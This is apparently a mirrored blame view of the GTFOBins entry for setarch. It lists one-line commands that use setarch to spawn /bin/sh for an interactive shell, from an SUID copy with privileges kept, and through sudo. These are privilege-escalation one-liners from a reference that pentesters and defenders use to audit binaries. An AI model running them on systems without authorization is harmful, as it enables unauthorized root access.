1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00
GTFOBins.github.io/_gtfobins/setarch.md

10 lines
188 B
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
2018-05-25 15:30:02 +02:00
execute-interactive:
2018-07-04 20:26:52 +02:00
- code: setarch $(arch) /bin/sh
2018-05-21 21:14:41 +02:00
suid-enabled:
2018-07-04 20:26:52 +02:00
- code: "./setarch $(arch) /bin/sh -p"
sudo-enabled:
- code: sudo setarch $(arch) /bin/sh
2018-05-23 11:34:47 +02:00
---